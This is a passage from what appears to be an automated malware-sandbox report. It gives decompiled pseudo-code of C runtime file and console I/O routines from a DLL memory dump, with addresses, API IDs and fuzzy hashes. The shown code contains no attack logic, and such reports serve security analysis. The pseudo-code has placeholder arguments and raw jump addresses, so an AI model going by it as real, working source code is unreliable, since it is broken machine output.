                          				r14d =  *(_t282 - 0x55);
                          				 *(_t282 - 0x41) = _t207;
                          				if (_t207 != 0xffffffff) goto 0x8c0825df;
                          				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x8c0825ac;
                          				if ((r12b & 0x00000001) == 0) goto 0x8c0825ac;
                          				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                          				asm("inc ecx");
                          				 *(_t282 - 0x55) = r14d;
                          				r8d = r15d;
                          				 *(_t285 + 0x28) = _t156;
                          				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                          				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                          				 *(_t282 - 0x41) = _t207;
                          				if (_t207 != 0xffffffff) goto 0x8c0825df;
                          				_t237 =  *__rdx;
                          				_t210 =  *((intOrPtr*)(0x8c0b4970 + (_t237 >> 6) * 8));
                          				 *(_t210 + (_t237 << 6) + 0x38) =  *(_t210 + (_t237 << 6) + 0x38) & 0x000000fe;
                          				E00007FF87FF88C07E630(GetLastError(), _t210,  *(_t282 - 0x49) >> 0x20);
                          				goto 0x8c0824bb;
                          				if (GetFileType(_t303) != 0) goto 0x8c08263d;
                          				_t134 = GetLastError();
                          				E00007FF87FF88C07E630(_t134, _t210,  *(_t282 - 0x49) >> 0x20);
                          				 *( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) =  *( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) & 0x000000fe;
                          				CloseHandle(_t300);
                          				if (_t134 != 0) goto 0x8c0824bb;
                          				_t137 = E00007FF87FF88C07E6A0(_t210);
                          				 *_t210 = 0xd;
                          				goto 0x8c0824bb;
                          				if (_t137 != 2) goto 0x8c08264a;
                          				goto 0x8c082652;
                          				if (_t137 != 3) goto 0x8c082652;
                          				_t160 =  *(_t282 - 0x59) | 0x48;
                          				E00007FF87FF88C083B9C(_t160,  *__rdx, _t186,  *(_t282 - 0x49) >> 0x20, _t207, __rdx, _t280, _t282, _t295, _t293);
                          				_t161 = _t160 | 0x00000001;
                          				 *(_t282 - 0x59) = _t161;
                          				 *( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) = _t161;
                          				 *((char*)( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x39)) = 0;
                          				if ((r12b & 0x00000002) == 0) goto 0x8c0826b4;
                          				_t139 = E00007FF87FF88C0822B4(_t161,  *__rdx, r12d & 0x0000003f,  *(_t282 - 0x49) >> 0x20, _t280);
                          				r13d = _t139;
                          				if (_t139 != 0) goto 0x8c0826e3;
                          				asm("movups xmm0, [ebp-0x59]");
                          				asm("movsd xmm1, [ebp-0x31]");
                          				r8d = r12d;
                          				asm("movaps [ebp-0x1], xmm0");
                          				 *((char*)(_t282 - 0x61)) = 0;
                          				asm("movsd [ebp+0xf], xmm1");
                          				_t140 = E00007FF87FF88C081E14( *_t278,  *(_t282 - 0x49) >> 0x20, _t282 - 1, _t280, _t282 - 0x61);
                          				if (_t140 == 0) goto 0x8c0826f2;
                          				r13d = _t140;
                          				E00007FF87FF88C085278( *_t278, r12d & 0x0000003f, _t185, _t140,  *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)),  *(_t282 - 0x49) >> 0x20, _t280);
                          				goto 0x8c08280e;
                          				 *((char*)( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x39)) =  *((intOrPtr*)(_t282 - 0x61));
                          				_t272 =  *_t278;
                          				_t273 = _t272 << 6;
                          				_t251 =  *((intOrPtr*)(0x8c0b4970 + (_t272 >> 6) * 8));
                          				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) & 0x000000fe;
                          				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) | r12d >> 0x00000010 & 0x00000001;
                          				if ((_t161 & 0x00000048) != 0) goto 0x8c082759;
                          				if ((r12b & 0x00000008) == 0) goto 0x8c082759;
                          				_t252 =  *_t278;
                          				_t221 =  *((intOrPtr*)(0x8c0b4970 + (_t252 >> 6) * 8));
                          				 *(_t221 + (_t252 << 6) + 0x38) =  *(_t221 + (_t252 << 6) + 0x38) | 0x00000020;
                          				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x8c08280c;
                          				if ((r12b & 0x00000001) == 0) goto 0x8c08280c;
                          				CloseHandle(_t281);
                          				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                          				asm("inc ecx");
                          				r8d =  *(_t282 - 0x11);
                          				 *(_t285 + 0x28) = 0xc0000000;
                          				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                          				 *(_t282 - 0x55) = r14d;
                          				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                          				if (_t221 != 0xffffffff) goto 0x8c0827f2;
                          				E00007FF87FF88C07E630(GetLastError(), _t221,  *(_t282 - 0x49) >> 0x20);
                          				 *( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) =  *( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) & 0x000000fe;
                          				E00007FF87FF88C083DB0(_t161,  *_t278, _t185, _t231, _t278, _t280);
                          				goto 0x8c0824bb;
                          				 *((long long*)( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x28)) = _t221;
                          				return 0;
                          			}

































                          0x7ff88c08243c
                          0x7ff88c08243c
                          0x7ff88c08243c
                          0x7ff88c08243f
                          0x7ff88c082443
                          0x7ff88c082447
                          0x7ff88c082454
                          0x7ff88c082458
                          0x7ff88c08245f
                          0x7ff88c082465
                          0x7ff88c082469
                          0x7ff88c08246c
                          0x7ff88c082470
                          0x7ff88c08247a
                          0x7ff88c08247f
                          0x7ff88c082482
                          0x7ff88c082485
                          0x7ff88c08248a
                          0x7ff88c082493
                          0x7ff88c082497
                          0x7ff88c08249b
                          0x7ff88c0824a0
                          0x7ff88c0824a5
                          0x7ff88c0824ae
                          0x7ff88c0824b0
                          0x7ff88c0824b5
                          0x7ff88c0824b8
                          0x7ff88c0824bb
                          0x7ff88c0824c2
                          0x7ff88c0824c7
                          0x7ff88c0824cc
                          0x7ff88c0824d1
                          0x7ff88c0824d3
                          0x7ff88c0824d8
                          0x7ff88c0824db
                          0x7ff88c0824de
                          0x7ff88c0824e3
                          0x7ff88c0824e9
                          0x7ff88c0824eb
                          0x7ff88c0824ff
                          0x7ff88c082502
                          0x7ff88c082507
                          0x7ff88c082514
                          0x7ff88c08251a
                          0x7ff88c082520
                          0x7ff88c082524
                          0x7ff88c08252f
                          0x7ff88c082536
                          0x7ff88c082539
                          0x7ff88c08253d
                          0x7ff88c082543
                          0x7ff88c08254c
                          0x7ff88c082557
                          0x7ff88c082564
                          0x7ff88c08256a
                          0x7ff88c08256c
                          0x7ff88c082579
                          0x7ff88c08257e
                          0x7ff88c082582
                          0x7ff88c082589
                          0x7ff88c08258d
                          0x7ff88c082599
                          0x7ff88c08259f
                          0x7ff88c0825aa
                          0x7ff88c0825ac
                          0x7ff88c0825c4
                          0x7ff88c0825c8
                          0x7ff88c0825d5
                          0x7ff88c0825da
                          0x7ff88c0825ea
                          0x7ff88c0825ec
                          0x7ff88c0825f6
                          0x7ff88c082617
                          0x7ff88c08261f
                          0x7ff88c082627
                          0x7ff88c08262d
                          0x7ff88c082632
                          0x7ff88c082638
                          0x7ff88c082643
                          0x7ff88c082648
                          0x7ff88c08264d
                          0x7ff88c08264f
                          0x7ff88c082657
                          0x7ff88c082669
                          0x7ff88c082677
                          0x7ff88c08267e
                          0x7ff88c082697
                          0x7ff88c0826a0
                          0x7ff88c0826a4
                          0x7ff88c0826a9
                          0x7ff88c0826ae
                          0x7ff88c0826b4
                          0x7ff88c0826be
                          0x7ff88c0826c7
                          0x7ff88c0826ca
                          0x7ff88c0826ce
                          0x7ff88c0826d2
                          0x7ff88c0826d7
                          0x7ff88c0826de
                          0x7ff88c0826e0
                          0x7ff88c0826e5
                          0x7ff88c0826ed
                          0x7ff88c08270a
                          0x7ff88c08270e
                          0x7ff88c08271b
                          0x7ff88c08271f
                          0x7ff88c08272b
                          0x7ff88c082730
                          0x7ff88c082737
                          0x7ff88c08273d
                          0x7ff88c08273f
                          0x7ff88c082750
                          0x7ff88c082754
                          0x7ff88c082765
                          0x7ff88c08276f
                          0x7ff88c082778
                          0x7ff88c082786
                          0x7ff88c08278c
                          0x7ff88c082791
                          0x7ff88c082795
                          0x7ff88c08279c
                          0x7ff88c0827a4
                          0x7ff88c0827b0
                          0x7ff88c0827bd
                          0x7ff88c0827c7
                          0x7ff88c0827e1
                          0x7ff88c0827e8
                          0x7ff88c0827ed
                          0x7ff88c082807
                          0x7ff88c08282a

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                          • String ID:
                          • API String ID: 1330151763-0
                          • Opcode ID: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                          • Instruction ID: 8e2e99f6d23fc0251e32e76318ce310d972d86bf3edba8c9ce71367ddf844974
                          • Opcode Fuzzy Hash: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                          • Instruction Fuzzy Hash: 8DC1AE32B25A418AEF648F65D8513AC37A1FB4ABE8F015235DE2E5B799CF38D415C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E00007FF87FF88C085864(void* __ebx, signed int __ecx, void* __edx, void* __ebp, signed int* __rax, long long __rbx, long long __rdx, long long __r8) {
                          				void* _t118;
                          				unsigned int _t135;
                          				void* _t139;
                          				void* _t142;
                          				char _t154;
                          				char _t155;
                          				char _t156;
                          				void* _t181;
                          				long long _t186;
                          				long long _t220;
                          				intOrPtr _t221;
                          				signed short* _t235;
                          				signed int* _t238;
                          				char* _t241;
                          				signed short* _t250;
                          				signed long long _t255;
                          				signed long long _t256;
                          				signed long long _t261;
                          				DWORD* _t263;
                          				signed short* _t264;
                          				void* _t270;
                          				void* _t272;
                          				signed long long _t274;
                          				void* _t276;
                          				void* _t277;
                          				long long _t279;
                          				signed short* _t281;
                          				signed short* _t288;
                          				long _t292;
                          				void* _t294;
                          				void* _t297;
                          				void* _t299;
                          				char* _t301;
                          				char* _t302;
                          				char* _t303;
                          
                          				_t279 = __r8;
                          				 *((long long*)(_t276 + 0x18)) = __rbx;
                          				 *((long long*)(_t276 + 0x10)) = __rdx;
                          				_t277 = _t276 - 0x60;
                          				r12d = r8d;
                          				if (r13d != 0xfffffffe) goto 0x8c0858a5;
                          				E00007FF87FF88C07E680(__rax);
                          				 *__rax = 0;
                          				E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 9;
                          				goto 0x8c085cae;
                          				if (__ecx < 0) goto 0x8c085c97;
                          				_t181 = r13d -  *0x8c0b4d70; // 0x40
                          				if (_t181 >= 0) goto 0x8c085c97;
                          				_t3 = _t270 + 1; // 0x1
                          				r8d = _t3;
                          				 *((long long*)(_t277 + 0x48)) = __r8;
                          				_t274 = __ecx << 6;
                          				_t255 = __ecx >> 6;
                          				 *(_t277 + 0x40) = _t255;
                          				_t220 =  *((intOrPtr*)(0x8c0b4970 + _t255 * 8));
                          				if (( *(_t220 + _t274 + 0x38) & r8b) == 0) goto 0x8c085c97;
                          				if (r12d - 0x7fffffff <= 0) goto 0x8c085911;
                          				E00007FF87FF88C07E680(_t220);
                          				 *_t220 = 0;
                          				E00007FF87FF88C07E6A0(_t220);
                          				 *_t220 = 0x16;
                          				goto 0x8c085ca9;
                          				if (r12d == 0) goto 0x8c085c93;
                          				if (( *(_t220 + _t274 + 0x38) & 0x00000002) != 0) goto 0x8c085c93;
                          				_t186 = __rdx;
                          				if (_t186 == 0) goto 0x8c0858fa;
                          				r10d =  *((char*)(_t220 + _t274 + 0x39));
                          				 *((long long*)(_t277 + 0x38)) =  *((intOrPtr*)(_t220 + _t274 + 0x28));
                          				 *((intOrPtr*)(_t277 + 0xa0)) = r10b;
                          				if (_t186 == 0) goto 0x8c08596c;
                          				if (_t186 != 0) goto 0x8c085961;
                          				if ((r8b &  !r12d) == 0) goto 0x8c085976;
                          				r14d = r12d;
                          				goto 0x8c085a0c;
                          				if ((r8b &  !r12d) != 0) goto 0x8c085992;
                          				E00007FF87FF88C07E680(_t220);
                          				 *_t220 = 0;
                          				_t118 = E00007FF87FF88C07E6A0(_t220);
                          				 *_t220 = 0x16;
                          				E00007FF87FF88C07E580(_t118);
                          				goto 0x8c085b18;
                          				r14d = r12d;
                          				r14d = r14d >> 1;
                          				r14d =  <  ? 4 : r14d;
                          				E00007FF87FF88C07E154(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                          				_t241 = _t220;
                          				E00007FF87FF88C07E114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                          				E00007FF87FF88C07E114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                          				_t301 = _t241;
                          				if (_t241 != 0) goto 0x8c0859db;
                          				E00007FF87FF88C07E6A0(_t220);
                          				 *_t220 = 0xc;
                          				E00007FF87FF88C07E680(_t220);
                          				 *_t220 = 8;
                          				goto 0x8c085b18;
                          				_t26 = _t255 + 1; // 0x1
                          				r8d = _t26;
                          				E00007FF87FF88C085D68(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)), _t255);
                          				_t256 =  *(_t277 + 0x40);
                          				r10b =  *((intOrPtr*)(_t277 + 0xa0));
                          				r8d = 1;
                          				 *((long long*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x30)) = _t220;
                          				_t221 =  *((intOrPtr*)(0x8c0b4970 + _t256 * 8));
                          				 *((long long*)(_t277 + 0x50)) = _t301;
                          				r9d = 0xa;
                          				if (( *(_t221 + _t274 + 0x38) & 0x00000048) == 0) goto 0x8c085aa1;
                          				_t154 =  *((intOrPtr*)(_t221 + _t274 + 0x3a));
                          				if (_t154 == r9b) goto 0x8c085aa1;
                          				if (r14d == 0) goto 0x8c085aa1;
                          				 *_t301 = _t154;
                          				r14d = r14d - 1;
                          				_t302 = _t301 + _t279;
                          				 *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3a)) = r9b;
                          				if (r10b == 0) goto 0x8c085aa1;
                          				_t155 =  *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3b));
                          				if (_t155 == r9b) goto 0x8c085aa1;
                          				if (r14d == 0) goto 0x8c085aa1;
                          				 *_t302 = _t155;
                          				_t303 = _t302 + _t279;
                          				r14d = r14d - 1;
                          				 *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3b)) = r9b;
                          				if (r10b != r8b) goto 0x8c085aa1;
                          				_t156 =  *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3c));
                          				if (_t156 == r9b) goto 0x8c085aa1;
                          				if (r14d == 0) goto 0x8c085aa1;
                          				 *_t303 = _t156;
                          				r14d = r14d - 1;
                          				 *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3c)) = r9b;
                          				if (E00007FF87FF88C083EE4(r13d, 0,  *((intOrPtr*)(0x8c0b4970 + _t256 * 8))) == 0) goto 0x8c085b36;
                          				_t228 =  *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8));
                          				if (( *( *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x8c085b36;
                          				if (GetConsoleMode(_t299) == 0) goto 0x8c085b36;
                          				if ( *((char*)(_t277 + 0xa0)) != 2) goto 0x8c085b3b;
                          				r14d = r14d >> 1;
                          				r8d = r14d;
                          				 *(_t277 + 0x20) = _t270;
                          				if (ReadConsoleW(_t297, _t294, _t292, _t263, _t270) != 0) goto 0x8c085b2a;
                          				E00007FF87FF88C07E630(GetLastError(),  *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)), _t241);
                          				E00007FF87FF88C07E114( *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)), _t241);
                          				goto 0x8c085cb1;
                          				goto 0x8c085b76;
                          				 *((intOrPtr*)(_t277 + 0x48)) = sil;
                          				r8d = r14d;
                          				 *(_t277 + 0x20) = _t270;
                          				if (ReadFile(_t272, ??, ??, ??) == 0) goto 0x8c085c5d;
                          				if ( *((intOrPtr*)(_t277 + 0xb8)) - r12d > 0) goto 0x8c085c5d;
                          				if (( *( *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x8c085b1b;
                          				if ( *((char*)(_t277 + 0xa0)) == 2) goto 0x8c085bbf;
                          				_t261 = _t303 + _t279;
                          				 *(_t277 + 0x20) = _t292 >> 1;
                          				_t135 = E00007FF87FF88C085564(__ebx, r13d, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)), _t261, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)),  *((intOrPtr*)(_t277 + 0xa8)));
                          				goto 0x8c085b1b;
                          				if (_t135 == 0) goto 0x8c085c45;
                          				_t281 =  *((intOrPtr*)(_t277 + 0x50));
                          				_t250 = _t281;
                          				_t264 = _t281;
                          				_t288 =  &(_t281[_t135 >> 1]);
                          				if (_t281 - _t288 >= 0) goto 0x8c085c38;
                          				_t235 =  &(_t281[1]);
                          				r9d =  *_t250 & 0x0000ffff;
                          				if (r9w == 0x1a) goto 0x8c085c2f;
                          				if (r9w != 0xd) goto 0x8c085c18;
                          				if (_t235 - _t288 >= 0) goto 0x8c085c18;
                          				if ( *_t235 != 0xa) goto 0x8c085c18;
                          				 *_t264 = 0xa;
                          				goto 0x8c085c28;
                          				_t264[1] = r9w;
                          				if ( &(_t250[3]) - _t288 < 0) goto 0x8c085beb;
                          				goto 0x8c085c38;
                          				_t238 =  *((intOrPtr*)(0x8c0b4970 + _t261 * 8));
                          				 *(_t238 + _t274 + 0x38) =  *(_t238 + _t274 + 0x38) | 0x00000002;
                          				goto 0x8c085b1b;
                          				E00007FF87FF88C085334(r13d, _t135 + _t135,  *((intOrPtr*)(_t277 + 0x50)), _t135 + _t135 >> 1);
                          				goto 0x8c085bb8;
                          				if (GetLastError() != 5) goto 0x8c085c83;
                          				E00007FF87FF88C07E6A0(_t238);
                          				 *_t238 = 9;
                          				_t139 = E00007FF87FF88C07E680(_t238);
                          				 *_t238 = 5;
                          				goto 0x8c085b18;
                          				if (_t139 != 0x6d) goto 0x8c085b11;
                          				goto 0x8c085b1b;
                          				goto 0x8c085cb1;
                          				E00007FF87FF88C07E680(_t238);
                          				 *_t238 = 0xa;
                          				_t142 = E00007FF87FF88C07E6A0(_t238);
                          				 *_t238 = 9;
                          				return E00007FF87FF88C07E580(_t142) | 0xffffffff;
                          			}






































                          0x7ff88c085864
                          0x7ff88c085864
                          0x7ff88c085869
                          0x7ff88c085879
                          0x7ff88c085883
                          0x7ff88c08588a
                          0x7ff88c08588c
                          0x7ff88c085893
                          0x7ff88c085895
                          0x7ff88c08589a
                          0x7ff88c0858a0
                          0x7ff88c0858a9
                          0x7ff88c0858af
                          0x7ff88c0858b6
                          0x7ff88c0858bf
                          0x7ff88c0858bf
                          0x7ff88c0858c6
                          0x7ff88c0858ce
                          0x7ff88c0858d2
                          0x7ff88c0858dd
                          0x7ff88c0858e2
                          0x7ff88c0858eb
                          0x7ff88c0858f8
                          0x7ff88c0858fa
                          0x7ff88c0858ff
                          0x7ff88c085901
                          0x7ff88c085906
                          0x7ff88c08590c
                          0x7ff88c085914
                          0x7ff88c08591f
                          0x7ff88c085925
                          0x7ff88c085928
                          0x7ff88c085932
                          0x7ff88c08593d
                          0x7ff88c085945
                          0x7ff88c085950
                          0x7ff88c085955
                          0x7ff88c08595f
                          0x7ff88c085961
                          0x7ff88c085967
                          0x7ff88c085974
                          0x7ff88c085976
                          0x7ff88c08597b
                          0x7ff88c08597d
                          0x7ff88c085982
                          0x7ff88c085988
                          0x7ff88c08598d
                          0x7ff88c085992
                          0x7ff88c085995
                          0x7ff88c08599b
                          0x7ff88c0859a2
                          0x7ff88c0859a9
                          0x7ff88c0859ac
                          0x7ff88c0859b3
                          0x7ff88c0859b8
                          0x7ff88c0859be
                          0x7ff88c0859c0
                          0x7ff88c0859c5
                          0x7ff88c0859cb
                          0x7ff88c0859d0
                          0x7ff88c0859d6
                          0x7ff88c0859e0
                          0x7ff88c0859e0
                          0x7ff88c0859e4
                          0x7ff88c0859e9
                          0x7ff88c0859f5
                          0x7ff88c0859fd
                          0x7ff88c085a07
                          0x7ff88c085a0c
                          0x7ff88c085a12
                          0x7ff88c085a17
                          0x7ff88c085a22
                          0x7ff88c085a24
                          0x7ff88c085a2b
                          0x7ff88c085a30
                          0x7ff88c085a32
                          0x7ff88c085a35
                          0x7ff88c085a3c
                          0x7ff88c085a42
                          0x7ff88c085a4a
                          0x7ff88c085a50
                          0x7ff88c085a57
                          0x7ff88c085a5c
                          0x7ff88c085a5e
                          0x7ff88c085a69
                          0x7ff88c085a6c
                          0x7ff88c085a6f
                          0x7ff88c085a77
                          0x7ff88c085a7d
                          0x7ff88c085a84
                          0x7ff88c085a89
                          0x7ff88c085a8b
                          0x7ff88c085a99
                          0x7ff88c085a9c
                          0x7ff88c085aab
                          0x7ff88c085abd
                          0x7ff88c085ac6
                          0x7ff88c085ada
                          0x7ff88c085ae4
                          0x7ff88c085af3
                          0x7ff88c085af9
                          0x7ff88c085afc
                          0x7ff88c085b09
                          0x7ff88c085b13
                          0x7ff88c085b1e
                          0x7ff88c085b25
                          0x7ff88c085b34
                          0x7ff88c085b36
                          0x7ff88c085b48
                          0x7ff88c085b4b
                          0x7ff88c085b5b
                          0x7ff88c085b69
                          0x7ff88c085b8b
                          0x7ff88c085b95
                          0x7ff88c085ba5
                          0x7ff88c085bae
                          0x7ff88c085bb3
                          0x7ff88c085bba
                          0x7ff88c085bc6
                          0x7ff88c085bc8
                          0x7ff88c085bd0
                          0x7ff88c085bd6
                          0x7ff88c085bd9
                          0x7ff88c085be0
                          0x7ff88c085be2
                          0x7ff88c085beb
                          0x7ff88c085bf4
                          0x7ff88c085bfb
                          0x7ff88c085c00
                          0x7ff88c085c05
                          0x7ff88c085c0b
                          0x7ff88c085c16
                          0x7ff88c085c18
                          0x7ff88c085c2b
                          0x7ff88c085c2d
                          0x7ff88c085c2f
                          0x7ff88c085c33
                          0x7ff88c085c40
                          0x7ff88c085c53
                          0x7ff88c085c58
                          0x7ff88c085c66
                          0x7ff88c085c68
                          0x7ff88c085c6d
                          0x7ff88c085c73
                          0x7ff88c085c78
                          0x7ff88c085c7e
                          0x7ff88c085c86
                          0x7ff88c085c8e
                          0x7ff88c085c95
                          0x7ff88c085c97
                          0x7ff88c085c9c
                          0x7ff88c085c9e
                          0x7ff88c085ca3
                          0x7ff88c085cc8

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                          • Instruction ID: 1be1cf0e1b2bd76c995eb95add0aaf68eef64bf10bebb37d9e6714b23caf34cd
                          • Opcode Fuzzy Hash: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                          • Instruction Fuzzy Hash: 12C1E422A1C68286FE759F22D84027D6BD5FB92BC4F558135EA8E07399CF3CE841CB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                          • Instruction ID: 5336fff0df82499d9a2f93a7083c9e98d747d60019dfe1a9d206dba996919bf7
                          • Opcode Fuzzy Hash: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                          • Instruction Fuzzy Hash: EEF06261B19B42A2EF888B21F4943796760FF89BD0F481039D91F46668DF3CEC98C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E00007FF87FF88C084AF8(signed long long __ecx, void* __edx, void* __esi, void* __ebp, intOrPtr* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
                          				char _v64;
                          				signed long long _v72;
                          				intOrPtr _v84;
                          				unsigned int _v88;
                          				intOrPtr _v96;
                          				long long _v100;
                          				signed int _v104;
                          				signed int _v120;
                          				void* __rbp;
                          				void* _t75;
                          				long _t94;
                          				unsigned int _t95;
                          				intOrPtr _t103;
                          				signed int _t124;
                          				intOrPtr _t158;
                          				unsigned long long _t164;
                          				signed int* _t166;
                          				intOrPtr _t169;
                          				unsigned int _t182;
                          				signed short* _t183;
                          				void* _t185;
                          				signed long long _t194;
                          				void* _t195;
                          				signed long long _t197;
                          				signed long long _t198;
                          				signed long long _t200;
                          				void* _t201;
                          				signed short* _t202;
                          
                          				_t192 = __r9;
                          				_t179 = __rdx;
                          				_t167 = __rbx;
                          				_a32 = __rbx;
                          				r15d = r8d;
                          				_t194 = __ecx;
                          				_t183 = __rdx;
                          				if (r8d != 0) goto 0x8c084b26;
                          				goto 0x8c084dc1;
                          				if (__rdx != 0) goto 0x8c084b4a;
                          				E00007FF87FF88C07E680(__rax);
                          				 *__rax = 0;
                          				_t75 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t75);
                          				goto 0x8c084dc1;
                          				r14d = r14d & 0x0000003f;
                          				_t197 = _t194 >> 6;
                          				_t200 = _t194 << 6;
                          				_v72 = _t197;
                          				_t169 =  *((intOrPtr*)(0x8c0b4970 + _t197 * 8));
                          				_t103 =  *((intOrPtr*)(_t169 + _t200 + 0x39));
                          				if (__rbx - 1 - 1 > 0) goto 0x8c084b80;
                          				if (( !r15d & 0x00000001) == 0) goto 0x8c084b2b;
                          				if (( *(_t169 + _t200 + 0x38) & 0x00000020) == 0) goto 0x8c084b96;
                          				_t14 = _t179 + 2; // 0x2
                          				r8d = _t14;
                          				E00007FF87FF88C085D68(0x8c0b4970, _t169, __rdx);
                          				_v88 = _t182;
                          				if (E00007FF87FF88C083EE4(r12d, 0, 0x8c0b4970) == 0) goto 0x8c084cab;
                          				_t158 =  *((intOrPtr*)(0x8c0b4970 + _t197 * 8));
                          				if (( *(0x8c0b4970 + _t200 + 0x38) & 0x00000080) == 0) goto 0x8c084cab;
                          				E00007FF87FF88C07F0D4(_t158, __rbx, _t169, _t179, __r9);
